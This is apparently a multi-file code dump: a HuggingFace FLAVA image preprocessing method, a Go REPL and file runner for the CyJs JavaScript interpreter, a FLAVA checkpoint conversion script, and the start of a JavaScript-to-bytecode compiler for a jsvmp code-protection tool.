    image_mean: Optional[Union[float, List[float]]] = None,
    image_std: Optional[Union[float, List[float]]] = None,
    do_map_pixels: bool = None,
    data_format: Optional[ChannelDimension] = ChannelDimension.FIRST,
) -> np.ndarray:
    """
    Preprocesses a single image: optional resize, center crop, rescale, normalize, pixel mapping, and channel
    format conversion, applied in that order.

    Raises:
        ValueError: If a step is enabled but a parameter it requires is missing.
    """
    # BUG FIX: the original guard was `do_resize and size is None or resample is None`; since `and` binds
    # tighter than `or`, it raised whenever `resample` was None, even with `do_resize=False`.
    if do_resize and (size is None or resample is None):
        raise ValueError("Size and resample must be specified if do_resize is True.")

    if do_rescale and rescale_factor is None:
        raise ValueError("Rescale factor must be specified if do_rescale is True.")

    if do_normalize and (image_mean is None or image_std is None):
        raise ValueError("Image mean and std must be specified if do_normalize is True.")

    # All transformations expect numpy arrays.
    image = to_numpy_array(image)

    if do_resize:
        image = self.resize(image=image, size=size, resample=resample)

    if do_center_crop:
        image = self.center_crop(image=image, size=crop_size)

    if do_rescale:
        image = self.rescale(image=image, scale=rescale_factor)

    if do_normalize:
        image = self.normalize(image=image, mean=image_mean, std=image_std)

    if do_map_pixels:
        image = self.map_pixels(image)

    if data_format is not None:
        image = to_channel_dimension_format(image, data_format)

    return image
    def preprocess(
        self,
        images: ImageInput,
        do_resize: Optional[bool] = None,
        size: Dict[str, int] = None,
        resample: PILImageResampling = None,
        do_center_crop: Optional[bool] = None,
        crop_size: Optional[Dict[str, int]] = None,
        do_rescale: Optional[bool] = None,
        rescale_factor: Optional[float] = None,
        do_normalize: Optional[bool] = None,
        image_mean: Optional[Union[float, List[float]]] = None,
        image_std: Optional[Union[float, List[float]]] = None,
        # Mask related params
        return_image_mask: Optional[bool] = None,
        input_size_patches: Optional[int] = None,
        total_mask_patches: Optional[int] = None,
        mask_group_min_patches: Optional[int] = None,
        mask_group_max_patches: Optional[int] = None,
        mask_group_min_aspect_ratio: Optional[float] = None,
        mask_group_max_aspect_ratio: Optional[float] = None,
        # Codebook related params
        return_codebook_pixels: Optional[bool] = None,
        codebook_do_resize: Optional[bool] = None,
        codebook_size: Optional[Dict[str, int]] = None,
        codebook_resample: Optional[int] = None,
        codebook_do_center_crop: Optional[bool] = None,
        codebook_crop_size: Optional[Dict[str, int]] = None,
        codebook_do_rescale: Optional[bool] = None,
        codebook_rescale_factor: Optional[float] = None,
        codebook_do_map_pixels: Optional[bool] = None,
        codebook_do_normalize: Optional[bool] = None,
        codebook_image_mean: Optional[Iterable[float]] = None,
        codebook_image_std: Optional[Iterable[float]] = None,
        return_tensors: Optional[Union[str, TensorType]] = None,
        data_format: ChannelDimension = ChannelDimension.FIRST,
        # NOTE: annotation fixed from `PIL.Image.Image` — the function returns a BatchFeature (see last line).
        **kwargs,
    ) -> BatchFeature:
        """
        Preprocess an image or batch of images.
        Args:
            images (`ImageInput`):
                Image to preprocess.
            do_resize (`bool`, *optional*, defaults to `self.do_resize`):
                Whether to resize the image.
            size (`Dict[str, int]`, *optional*, defaults to `self.size`):
                Size of the image.
            resample (`int`, *optional*, defaults to `self.resample`):
                Resampling filter to use if resizing the image. This can be one of the enum `PILImageResampling`, Only
                has an effect if `do_resize` is set to `True`.
            do_center_crop (`bool`, *optional*, defaults to `self.do_center_crop`):
                Whether to center crop the image.
            crop_size (`Dict[str, int]`, *optional*, defaults to `self.crop_size`):
                Size of the center crop. Only has an effect if `do_center_crop` is set to `True`.
            do_rescale (`bool`, *optional*, defaults to `self.do_rescale`):
                Whether to rescale the image values between [0 - 1].
            rescale_factor (`float`, *optional*, defaults to `self.rescale_factor`):
                Rescale factor to rescale the image by if `do_rescale` is set to `True`.
            do_normalize (`bool`, *optional*, defaults to `self.do_normalize`):
                Whether to normalize the image.
            image_mean (`float` or `List[float]`, *optional*, defaults to `self.image_mean`):
                Image mean.
            image_std (`float` or `List[float]`, *optional*, defaults to `self.image_std`):
                Image standard deviation.
            return_image_mask (`bool`, *optional*, defaults to `self.return_image_mask`):
                Whether to return the image mask.
            input_size_patches (`int`, *optional*, defaults to `self.input_size_patches`):
                Size of the patches to extract from the image.
            total_mask_patches (`int`, *optional*, defaults to `self.total_mask_patches`):
                Total number of patches to extract from the image.
            mask_group_min_patches (`int`, *optional*, defaults to `self.mask_group_min_patches`):
                Minimum number of patches to extract from the image.
            mask_group_max_patches (`int`, *optional*, defaults to `self.mask_group_max_patches`):
                Maximum number of patches to extract from the image.
            mask_group_min_aspect_ratio (`float`, *optional*, defaults to `self.mask_group_min_aspect_ratio`):
                Minimum aspect ratio of the patches to extract from the image.
            mask_group_max_aspect_ratio (`float`, *optional*, defaults to `self.mask_group_max_aspect_ratio`):
                Maximum aspect ratio of the patches to extract from the image.
            return_codebook_pixels (`bool`, *optional*, defaults to `self.return_codebook_pixels`):
                Whether to return the codebook pixels.
            codebook_do_resize (`bool`, *optional*, defaults to `self.codebook_do_resize`):
                Whether to resize the codebook pixels.
            codebook_size (`Dict[str, int]`, *optional*, defaults to `self.codebook_size`):
                Size of the codebook pixels.
            codebook_resample (`int`, *optional*, defaults to `self.codebook_resample`):
                Resampling filter to use if resizing the codebook pixels. This can be one of the enum
                `PILImageResampling`, Only has an effect if `codebook_do_resize` is set to `True`.
            codebook_do_center_crop (`bool`, *optional*, defaults to `self.codebook_do_center_crop`):
                Whether to center crop the codebook pixels.
            codebook_crop_size (`Dict[str, int]`, *optional*, defaults to `self.codebook_crop_size`):
                Size of the center crop of the codebook pixels. Only has an effect if `codebook_do_center_crop` is set
                to `True`.
            codebook_do_rescale (`bool`, *optional*, defaults to `self.codebook_do_rescale`):
                Whether to rescale the codebook pixels values between [0 - 1].
            codebook_rescale_factor (`float`, *optional*, defaults to `self.codebook_rescale_factor`):
                Rescale factor to rescale the codebook pixels by if `codebook_do_rescale` is set to `True`.
            codebook_do_map_pixels (`bool`, *optional*, defaults to `self.codebook_do_map_pixels`):
                Whether to map the codebook pixels values.
            codebook_do_normalize (`bool`, *optional*, defaults to `self.codebook_do_normalize`):
                Whether to normalize the codebook pixels.
            codebook_image_mean (`float` or `List[float]`, *optional*, defaults to `self.codebook_image_mean`):
                Codebook pixels mean to normalize the codebook pixels by if `codebook_do_normalize` is set to `True`.
            codebook_image_std (`float` or `List[float]`, *optional*, defaults to `self.codebook_image_std`):
                Codebook pixels standard deviation to normalize the codebook pixels by if `codebook_do_normalize` is
                set to `True`.
            return_tensors (`str` or `TensorType`, *optional*):
                The type of tensors to return. Can be one of:
                    - Unset: Return a list of `np.ndarray`.
                    - `TensorType.TENSORFLOW` or `'tf'`: Return a batch of type `tf.Tensor`.
                    - `TensorType.PYTORCH` or `'pt'`: Return a batch of type `torch.Tensor`.
                    - `TensorType.NUMPY` or `'np'`: Return a batch of type `np.ndarray`.
                    - `TensorType.JAX` or `'jax'`: Return a batch of type `jax.numpy.ndarray`.
            data_format (`ChannelDimension` or `str`, *optional*, defaults to `ChannelDimension.FIRST`):
                The channel dimension format for the output image. Can be one of:
                    - `ChannelDimension.FIRST`: image in (num_channels, height, width) format.
                    - `ChannelDimension.LAST`: image in (height, width, num_channels) format.

        Returns:
            `BatchFeature`: holds `pixel_values` and, when requested, `codebook_pixel_values` and/or
            `bool_masked_pos` entries, converted to `return_tensors`.
        """
        # Resolve every option against the defaults configured on the instance; explicit
        # arguments always win over `self.*` values.
        do_resize = do_resize if do_resize is not None else self.do_resize
        size = size if size is not None else self.size
        size = get_size_dict(size)
        resample = resample if resample is not None else self.resample
        do_center_crop = do_center_crop if do_center_crop is not None else self.do_center_crop
        crop_size = crop_size if crop_size is not None else self.crop_size
        crop_size = get_size_dict(crop_size, param_name="crop_size")
        do_rescale = do_rescale if do_rescale is not None else self.do_rescale
        rescale_factor = rescale_factor if rescale_factor is not None else self.rescale_factor
        do_normalize = do_normalize if do_normalize is not None else self.do_normalize
        image_mean = image_mean if image_mean is not None else self.image_mean
        image_std = image_std if image_std is not None else self.image_std
        return_image_mask = return_image_mask if return_image_mask is not None else self.return_image_mask
        input_size_patches = input_size_patches if input_size_patches is not None else self.input_size_patches
        total_mask_patches = total_mask_patches if total_mask_patches is not None else self.total_mask_patches
        mask_group_min_patches = (
            mask_group_min_patches if mask_group_min_patches is not None else self.mask_group_min_patches
        )
        mask_group_max_patches = (
            mask_group_max_patches if mask_group_max_patches is not None else self.mask_group_max_patches
        )
        mask_group_min_aspect_ratio = (
            mask_group_min_aspect_ratio
            if mask_group_min_aspect_ratio is not None
            else self.mask_group_min_aspect_ratio
        )
        mask_group_max_aspect_ratio = (
            mask_group_max_aspect_ratio
            if mask_group_max_aspect_ratio is not None
            else self.mask_group_max_aspect_ratio
        )
        return_codebook_pixels = (
            return_codebook_pixels if return_codebook_pixels is not None else self.return_codebook_pixels
        )
        codebook_do_resize = codebook_do_resize if codebook_do_resize is not None else self.codebook_do_resize
        codebook_size = codebook_size if codebook_size is not None else self.codebook_size
        codebook_size = get_size_dict(codebook_size, param_name="codebook_size")
        codebook_resample = codebook_resample if codebook_resample is not None else self.codebook_resample
        codebook_do_rescale = codebook_do_rescale if codebook_do_rescale is not None else self.codebook_do_rescale
        codebook_rescale_factor = (
            codebook_rescale_factor if codebook_rescale_factor is not None else self.codebook_rescale_factor
        )
        codebook_do_center_crop = (
            codebook_do_center_crop if codebook_do_center_crop is not None else self.codebook_do_center_crop
        )
        codebook_crop_size = codebook_crop_size if codebook_crop_size is not None else self.codebook_crop_size
        codebook_crop_size = get_size_dict(codebook_crop_size, param_name="codebook_crop_size")
        codebook_do_map_pixels = (
            codebook_do_map_pixels if codebook_do_map_pixels is not None else self.codebook_do_map_pixels
        )
        codebook_do_normalize = (
            codebook_do_normalize if codebook_do_normalize is not None else self.codebook_do_normalize
        )
        codebook_image_mean = codebook_image_mean if codebook_image_mean is not None else self.codebook_image_mean
        codebook_image_std = codebook_image_std if codebook_image_std is not None else self.codebook_image_std
        # Accept a single image or a batch; from here on everything is a list.
        images = make_list_of_images(images)
        if not valid_images(images):
            raise ValueError(
                "Invalid image type. Must be of type PIL.Image.Image, numpy.ndarray, "
                "torch.Tensor, tf.Tensor or jax.ndarray."
            )
        # Main pixel values: note `do_map_pixels=False` — the logit-Laplace mapping is
        # only applied to the codebook branch below.
        processed_images = [
            self._preprocess_image(
                image=img,
                do_resize=do_resize,
                size=size,
                resample=resample,
                do_center_crop=do_center_crop,
                crop_size=crop_size,
                do_rescale=do_rescale,
                rescale_factor=rescale_factor,
                do_normalize=do_normalize,
                image_mean=image_mean,
                image_std=image_std,
                do_map_pixels=False,
                data_format=data_format,
            )
            for img in images
        ]
        data = {"pixel_values": processed_images}
        # Optional second pass over the same images with the codebook-specific settings.
        if return_codebook_pixels:
            codebook_images = [
                self._preprocess_image(
                    image=img,
                    do_resize=codebook_do_resize,
                    size=codebook_size,
                    resample=codebook_resample,
                    do_center_crop=codebook_do_center_crop,
                    crop_size=codebook_crop_size,
                    do_rescale=codebook_do_rescale,
                    rescale_factor=codebook_rescale_factor,
                    do_normalize=codebook_do_normalize,
                    image_mean=codebook_image_mean,
                    image_std=codebook_image_std,
                    do_map_pixels=codebook_do_map_pixels,
                    data_format=data_format,
                )
                for img in images
            ]
            data["codebook_pixel_values"] = codebook_images
        # Optional boolean patch masks, one independently-sampled mask per image.
        if return_image_mask:
            mask_generator = self.masking_generator(
                input_size_patches=input_size_patches,
                total_mask_patches=total_mask_patches,
                mask_group_min_patches=mask_group_min_patches,
                mask_group_max_patches=mask_group_max_patches,
                mask_group_min_aspect_ratio=mask_group_min_aspect_ratio,
                mask_group_max_aspect_ratio=mask_group_max_aspect_ratio,
            )
            masks = [mask_generator() for _ in images]
            data["bool_masked_pos"] = masks
        return BatchFeature(data=data, tensor_type=return_tensors)
|
2833844911/gojsvmp | 2,627 | main.go | package main
import (
	"bufio"
	"fmt"
	"io"
	"io/ioutil"
	"os"
	"strings"

	"github.com/peterh/liner"
	"golang.org/x/text/encoding/simplifiedchinese"
	"golang.org/x/text/transform"

	"myvmp/ast"
	"myvmp/evaluator"
	"myvmp/lexer"
	"myvmp/object"
	"myvmp/parse"
	"myvmp/promise"
)
// getdt lexes, parses and evaluates one chunk of source code inside env,
// bracketing the run with the promise machinery's init/done hooks.
func getdt(code string, env *object.Environment) {
	promise.CyJSInit()
	tokens := lexer.New(code).Input()
	statements := parse.NewParse(tokens)
	program := &ast.Program{Body: statements}
	program.StatementNode()
	evaluator.StartEval(program.Body, env)
	promise.Done()
}
// cmd runs the interactive REPL: reads a line, appends a ";" terminator,
// evaluates it in a shared environment, and persists readline history to
// ".liner_history" on exit.
func cmd() {
	line := liner.NewLiner()
	defer line.Close()
	fmt.Println("Welcome to the interactive CyJsShell. Type 'exit' or 'exit()' to quit.")
	line.SetCtrlCAborts(true)
	env := object.NewEnv(nil)
	for {
		code, err := line.Prompt(">>>")
		if err != nil {
			// Bug fix: the original printed the error and `continue`d for every
			// error. Once stdin is closed (io.EOF) or the user aborts with
			// Ctrl-C (liner.ErrPromptAborted), Prompt fails on every call, so
			// that turned into an infinite error loop. Exit the REPL instead.
			if err == io.EOF || err == liner.ErrPromptAborted {
				break
			}
			fmt.Println("Error reading input:", err)
			continue
		}
		line.AppendHistory(code)
		// Terminate the statement so the parser sees a complete input.
		code = code + ";"
		if code == "exit;" || code == "exit();" {
			break
		}
		// Recover from interpreter panics so one bad input doesn't kill the shell.
		func() {
			defer func() {
				if r := recover(); r != nil {
					fmt.Println("Recovered from panic:", r)
				}
			}()
			getdt(code, env)
		}()
	}
	f, err := os.Create(".liner_history")
	if err != nil {
		fmt.Println("Error creating history file:", err)
		return
	}
	defer f.Close()
	line.WriteHistory(f)
}
// doFile evaluates a complete, already-decoded script source string.
func doFile(code string) {
	evaluator.Eval(code)
}
// readAllOrReport drains r into a string; on failure it prints the error and
// returns ok=false so the caller can bail out.
func readAllOrReport(r io.Reader) (string, bool) {
	data, err := ioutil.ReadAll(r)
	if err != nil {
		fmt.Printf("Error reading file: %v\n", err)
		return "", false
	}
	return string(data), true
}

// main interprets the script file named by os.Args[1]. The first line may be
// an encoding marker ("//--utf-8--" or "//--gbk--"); without a marker the
// first line is treated as part of the script. With no argument the
// interactive REPL is started instead.
func main() {
	if len(os.Args) < 2 {
		fmt.Println("CyJs version 1.13\n")
		cmd()
		return
	}
	filePath := os.Args[1]
	file, err := os.Open(filePath)
	if err != nil {
		fmt.Printf("Error opening file: %v\n", err)
		return
	}
	defer file.Close()
	reader := bufio.NewReader(file)
	flineee, err := reader.ReadString('\n')
	// Bug fix: for a one-line script with no trailing newline, ReadString
	// returns io.EOF *together with* the data. The original treated that as
	// fatal and refused to run the file; accept EOF when data was read.
	if err != nil && !(err == io.EOF && len(flineee) > 0) {
		fmt.Printf("Error reading first line: %v\n", err)
		return
	}
	fline := strings.TrimSpace(flineee)
	firstLine := strings.Replace(fline, " ", "", -1)
	var content string
	switch firstLine {
	case "//--utf-8--":
		body, ok := readAllOrReport(reader)
		if !ok {
			return
		}
		content = body
	case "//--gbk--":
		// Decode the rest of the file from GBK to UTF-8 on the fly.
		gbkReader := transform.NewReader(reader, simplifiedchinese.GBK.NewDecoder())
		body, ok := readAllOrReport(gbkReader)
		if !ok {
			return
		}
		content = body
	default:
		// No marker: the first line belongs to the script itself.
		body, ok := readAllOrReport(reader)
		if !ok {
			return
		}
		content = fline + "\n" + body
	}
	content = strings.TrimSpace(content) + ";"
	doFile(content)
}
|
27182812/ChatGLM-LLaMA-chinese-insturct | 4,372 | src/transformers/models/flava/convert_flava_original_pytorch_to_hf.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import torch
from transformers import FlavaConfig, FlavaForPreTraining
from transformers.models.flava.convert_dalle_to_flava_codebook import convert_dalle_checkpoint
def count_parameters(state_dict):
    """Sum all tensor values in `state_dict`, skipping `encoder.embeddings` entries.

    The embedding weights are double copied in the original FLAVA checkpoint, so
    they are excluded to keep the parameter-mass comparison meaningful.
    """
    total = 0
    for name, tensor in state_dict.items():
        if "encoder.embeddings" in name:
            continue
        total = total + tensor.float().sum()
    return total
def upgrade_state_dict(state_dict, codebook_state_dict):
    """Rewrite original FLAVA checkpoint keys to the transformers naming scheme.

    Text/image encoder embedding weights are dropped (they are duplicated in the
    original checkpoint), every remaining tensor is cast to float32, and codebook
    weights are nested under the ``image_codebook.`` prefix.
    """
    # Order matters: more specific patterns must be rewritten before shorter
    # prefixes they contain (e.g. "mm_encoder.module.encoder.cls_token" before
    # "mm_encoder.module", "mm_text_projection" before "text_projection").
    renames = (
        ("heads.cmd.mim_head.cls.predictions", "mmm_image_head"),
        ("heads.cmd.mlm_head.cls.predictions", "mmm_text_head"),
        ("heads.cmd.itm_head.cls", "itm_head"),
        ("heads.cmd.itm_head.pooler", "itm_head.pooler"),
        ("heads.cmd.clip_head.logit_scale", "flava.logit_scale"),
        ("heads.fairseq_mlm.cls.predictions", "mlm_head"),
        ("heads.imagenet.mim_head.cls.predictions", "mim_head"),
        ("mm_text_projection", "flava.text_to_mm_projection"),
        ("mm_image_projection", "flava.image_to_mm_projection"),
        ("image_encoder.module", "flava.image_model"),
        ("text_encoder.module", "flava.text_model"),
        ("mm_encoder.module.encoder.cls_token", "flava.multimodal_model.cls_token"),
        ("mm_encoder.module", "flava.multimodal_model"),
        ("text_projection", "flava.text_projection"),
        ("image_projection", "flava.image_projection"),
    )
    upgraded = {}
    for name, tensor in state_dict.items():
        # Embedding weights are double copied in the original checkpoint; skip them.
        if "text_encoder.embeddings" in name or "image_encoder.embeddings" in name:
            continue
        for old, new in renames:
            name = name.replace(old, new)
        upgraded[name] = tensor.float()
    for name, tensor in codebook_state_dict.items():
        upgraded["image_codebook." + name] = tensor
    return upgraded
@torch.no_grad()
def convert_flava_checkpoint(checkpoint_path, codebook_path, pytorch_dump_folder_path, config_path=None):
    """
    Copy/paste/tweak model's weights to transformers design.
    """
    # Build the target config from an explicit config file, or use the defaults.
    config = FlavaConfig.from_pretrained(config_path) if config_path is not None else FlavaConfig()
    hf_model = FlavaForPreTraining(config).eval()

    # Convert the DALL-E codebook weights; they are merged into the same state dict.
    codebook = convert_dalle_checkpoint(codebook_path, None, save_checkpoint=False)

    # The checkpoint may be a local file or a URL.
    if os.path.exists(checkpoint_path):
        original = torch.load(checkpoint_path, map_location="cpu")
    else:
        original = torch.hub.load_state_dict_from_url(checkpoint_path, map_location="cpu")

    hf_model.load_state_dict(upgrade_state_dict(original, codebook))

    # Sanity check: the total parameter mass must survive the renaming.
    converted_count = count_parameters(hf_model.state_dict())
    original_count = count_parameters(original) + count_parameters(codebook)
    assert torch.allclose(converted_count, original_count, atol=1e-3)

    hf_model.save_pretrained(pytorch_dump_folder_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--pytorch_dump_folder_path", default=None, type=str, help="Path to the output PyTorch model.")
parser.add_argument("--checkpoint_path", default=None, type=str, help="Path to flava checkpoint")
parser.add_argument("--codebook_path", default=None, type=str, help="Path to flava codebook checkpoint")
parser.add_argument("--config_path", default=None, type=str, help="Path to hf config.json of model to convert")
args = parser.parse_args()
convert_flava_checkpoint(args.checkpoint_path, args.codebook_path, args.pytorch_dump_folder_path, args.config_path)
|
2833844911/cy_jsvmp | 28,166 | mainold.js | const parser = require("@babel/parser");
const generator = require("@babel/generator").default;
const fs = require("fs");
const {renameCj} = require("./tool/rename");
const process = require("child_process");
const {es6toes5} = require("./tool/es5toes6");
// 是否转es5
offes5 = 0
var dat = {"instanceof": 1811,"+":20, "<":24, "*":27, "%":28, "^":29, "/":30, "<<":31, "|":32, ">>":33, ">>>":34, "&":35, "-":19, "<=": 36, ">=":37,">":38,"==":39,"===":53,"!==":54,"!=":550,"in":551}
var datkey = Object.keys(dat)
for (let i = 0; i< datkey.length; i++){
datkey[i] = datkey[i]+"="
}
var fornum = 0
function cbbjsvmp(){
var dataText
if (offes5 === 1){
dataText = fs.readFileSync("./dist/"+soure) + '';
}else {
dataText = fs.readFileSync("./src/"+soure) + '';
}
dataText2 = fs.readFileSync("./tool/jsvmp_02.js") + '';
var changlc = {}
var constantPool = []
dataText = es6toes5(dataText)
var ast = parser.parse(dataText)
// 使用插件优化代码
// ast = renameCj(ast)
var numberKuai = 0
function copyArrayList(sour, newl){
for (let i = 0; i < newl.length; i++){
sour.push(newl[i])
}
}
function toPool(value){
var a1,a2
a1 = constantPool.indexOf(value)
if (a1 == -1){
a2 = constantPool.length
constantPool.push(value)
return a2
}else{
return a1
}
}
function startgetType(node, variablePool, zhili){
if (node == null){
return;
}
var a1,a2,a3,a4,a5;
switch(node.type){
case "EmptyStatement":
break
case "ConditionalExpression":
case "IfStatement":
startgetType(node.test, variablePool, zhili);
if (node.test.type === "AssignmentExpression"){
startgetType(node.test.left, variablePool, zhili);
}
zhili.push(192)
let ujj3 = []
startgetType(node.alternate, variablePool, ujj3)
zhili.push(ujj3.length + 2)
copyArrayList(zhili,ujj3)
zhili.push(190)
let ujj2 = []
startgetType(node.consequent, variablePool, ujj2)
zhili.push(ujj2.length)
copyArrayList(zhili,ujj2)
break
case "VariableDeclaration":
for (let i=0;i< node.declarations.length; i++){
startgetType(node.declarations[i], variablePool, zhili)
}
break
case "ForInStatement":
fornum += 1
let fbme = fornum
startgetType(node.right, variablePool,zhili)
zhili.push(57)
zhili.push(fbme)
zhili.push(10)
zhili.push(toPool( 0))
zhili.push(23)
zhili.push(22)
zhili.push(toPool("for_in_xh_cbb"+fbme))
let fggg = zhili.length
zhili.push(23)
zhili.push(10)
zhili.push(toPool("for_in_xh_cbb"+fbme))
zhili.push(181)
zhili.push(23)
zhili.push(10)
zhili.push(toPool("for_in_xh_cbb_list"+fbme))
zhili.push(181)
zhili.push(10)
zhili.push(toPool("length"))
zhili.push(181)
zhili.push(240)
zhili.push(25)
let dyyy = []
if (node.left.type === "VariableDeclaration"){
startgetType(node.left, variablePool,dyyy)
startgetType(node.left.declarations[0].id, variablePool,dyyy)
}else {
startgetType(node.left, variablePool,dyyy)
}
dyyy.pop()
dyyy.push(23)
dyyy.push(10)
dyyy.push(toPool( "for_in_xh_cbb_list"+fbme))
dyyy.push(181)
dyyy.push(23)
dyyy.push(10)
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(181)
dyyy.push(181)
dyyy.push(90)
startgetType(node.body,variablePool,dyyy)
dyyy.push(23)
dyyy.push(26)
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(190)
dyyy.push(fggg - zhili.length -dyyy.length -2 )
let bbblenko = dyyy.length
for (let i =0; i< bbblenko; i++){
if (dyyy[i] == "cbb_break_in_the_this_yhh_417"){
dyyy[i] = 190;
dyyy[i+1] = bbblenko - i - 2
}else if (dyyy[i] == "cbb_continue_in_the_this_yhh_417"){
dyyy[i] = 190;
dyyy[i+1] = bbblenko - i - 7
}
}
zhili.push(dyyy.length)
copyArrayList(zhili, dyyy)
break
case "UpdateExpression":
startgetType(node.argument, variablePool, zhili)
if (node.operator =="++"){
// zhili.push(26)
zhili.pop()
zhili.push(10)
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(20)
zhili.push(90)
startgetType(node.argument, variablePool, zhili)
}else if (node.operator =="--"){
zhili.pop()
zhili.push(10)
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(19)
zhili.push(90)
startgetType(node.argument, variablePool, zhili)
}
break
case "BreakStatement":
zhili.push("cbb_break_in_the_this_yhh_417")
zhili.push(undefined)
break
case "DebuggerStatement":
zhili.push(194)
break
case "ForStatement":
startgetType(node.init, variablePool,zhili)
let lenko = zhili.length
startgetType(node.test, variablePool,zhili)
if (node.test == null)
{
zhili.push(10)
zhili.push(toPool(true))
}
zhili.push(25)
let fgfgfdsujj = []
startgetType(node.body, variablePool, fgfgfdsujj)
startgetType(node.update, variablePool, fgfgfdsujj)
fgfgfdsujj.push(190)
fgfgfdsujj.push(lenko - zhili.length - fgfgfdsujj.length -2)
zhili.push(fgfgfdsujj.length)
lenko = fgfgfdsujj.length
for (let i =0; i< lenko; i++){
if (fgfgfdsujj[i] == "cbb_break_in_the_this_yhh_417"){
fgfgfdsujj[i] = 190;
fgfgfdsujj[i+1] = lenko - i - 2
}else if (fgfgfdsujj[i] == "cbb_continue_in_the_this_yhh_417"){
fgfgfdsujj[i] = 190;
fgfgfdsujj[i+1] = lenko - i - 4
}
}
copyArrayList(zhili, fgfgfdsujj)
break
case "WhileStatement":
let ffflenko = zhili.length
startgetType(node.test, variablePool,zhili)
zhili.push(25)
let jiiiujj = []
startgetType(node.body, variablePool, jiiiujj)
jiiiujj.push(190)
jiiiujj.push(ffflenko - zhili.length - jiiiujj.length -2)
zhili.push(jiiiujj.length)
ffflenko = jiiiujj.length
for (let i =0; i< ffflenko; i++){
if (jiiiujj[i] == "cbb_break_in_the_this_yhh_417"){
jiiiujj[i] = 190;
jiiiujj[i+1] = ffflenko - i - 2
}else if (jiiiujj[i] == "cbb_continue_in_the_this_yhh_417"){
jiiiujj[i] = 190;
jiiiujj[i+1] = ffflenko - i - 4
}
}
copyArrayList(zhili, jiiiujj)
break
case "DoWhileStatement":
let lenko2 = zhili.length
let ujj = []
startgetType(node.body, variablePool,ujj)
// ujj.push(190)
// ujj.push(lenko - zhili.length -ujj.length-2)
lenkoe = ujj.length
for (let i =0; i< lenkoe; i++){
if (ujj[i] == "cbb_break_in_the_this_yhh_417"){
ujj[i] = 190;
ujj[i+1] = lenkoe - i - 2
}else if (ujj[i] == "cbb_continue_in_the_this_yhh_417"){
ujj[i] = 190;
ujj[i+1] = lenkoe - i - 4
}
}
copyArrayList(zhili, ujj)
startgetType(node.test, variablePool,zhili)
zhili.push(192)
zhili.push(lenko2-zhili.length-1)
break
case "ContinueStatement":
zhili.push("cbb_continue_in_the_this_yhh_417")
zhili.push(undefined)
break
case "VariableDeclarator":
variablePool[node.id.name] = null;
if (node.init != null){
startgetType(node.init, variablePool, zhili)
if (node.init.type == "AssignmentExpression"){
startgetType(node.init.left, variablePool, zhili)
}
zhili.push(23)
zhili.push(22)
a1 = constantPool.indexOf(node.id.name)
if (a1 == -1){
zhili.push(constantPool.length)
constantPool.push(node.id.name)
}else{
zhili.push(a1)
}
}
break
case "SwitchStatement":
startgetType(node.discriminant, variablePool,zhili)
if (node.discriminant.type === "AssignmentExpression"){
startgetType(node.discriminant.left, variablePool,zhili)
}
let hu = node.cases.length
let zwdz = [];
let gggcbb = []
for (let i = 0;i < hu; i++){
let litshuz = []
if (node.cases[i].test == null){
zhili.push(10)
zhili.push(toPool( null))
}else{
startgetType(node.cases[i].test, variablePool, zhili)
}
zwdz.push(gggcbb.length)
// 块
for (let i2 = 0; i2 < node.cases[i].consequent.length; i2++){
startgetType(node.cases[i].consequent[i2], variablePool, litshuz)
}
copyArrayList(gggcbb, litshuz)
}
zhili.push(10)
zhili.push(toPool( null))
for (let i = 0;i < zwdz.length; i++){
zhili.push(10)
zhili.push(toPool(zwdz[i]))
}
zhili.push(10)
zhili.push(toPool(gggcbb.length))
zhili.push(48)
zhili.push(hu+1)
let oolenko = gggcbb.length
for (let i =0; i< oolenko; i++){
if (gggcbb[i] == "cbb_break_in_the_this_yhh_417"){
gggcbb[i] = 190;
gggcbb[i+1] = oolenko - i -2
}
}
copyArrayList(zhili, gggcbb)
break
case "LogicalExpression":
if (node.operator == "&&"){
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(51)
let bh = []
startgetType(node.right, variablePool, bh)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, bh)
}
zhili.push(bh.length)
copyArrayList(zhili, bh)
}else if (node.operator == "||"){
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(252)
let bh = []
startgetType(node.right, variablePool, bh)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, bh)
}
zhili.push(bh.length)
copyArrayList(zhili, bh)
}
break
case "BooleanLiteral":
case "NumericLiteral":
case "NullLiteral":
case "StringLiteral":
zhili.push(10)
a1 = constantPool.indexOf(node.value)
zhili.push(toPool(node.value))
break;
case "Identifier":
zhili.push(23)
zhili.push(10)
zhili.push(toPool(node.name))
zhili.push(181)
break
case "MemberExpression":
startgetType(node.object, variablePool, zhili)
if (node.object.type == "AssignmentExpression"){
startgetType(node.object.left, variablePool, zhili)
}
if (node.property.type == "Identifier" && node.computed == false){
zhili.push(10)
zhili.push(toPool(node.property.name))
zhili.push(181)
}else if (node.property.type == "NumericLiteral" || node.property.type == "StringLiteral"){
zhili.push(10)
zhili.push(toPool(node.property.value))
zhili.push(181)
}else{
startgetType(node.property, variablePool, zhili)
if (node.property.type == "AssignmentExpression"){
startgetType(node.property.left, variablePool, zhili)
}
zhili.push(181)
}
break
case "BinaryExpression":
startgetType(node.right, variablePool, zhili)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, zhili)
}
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(dat[node.operator])
break
case "UnaryExpression":
if (node.argument.type == "NumericLiteral" || node.argument.type == "BooleanLiteral" || node.argument.type == "StringLiteral"){
zhili.push(10)
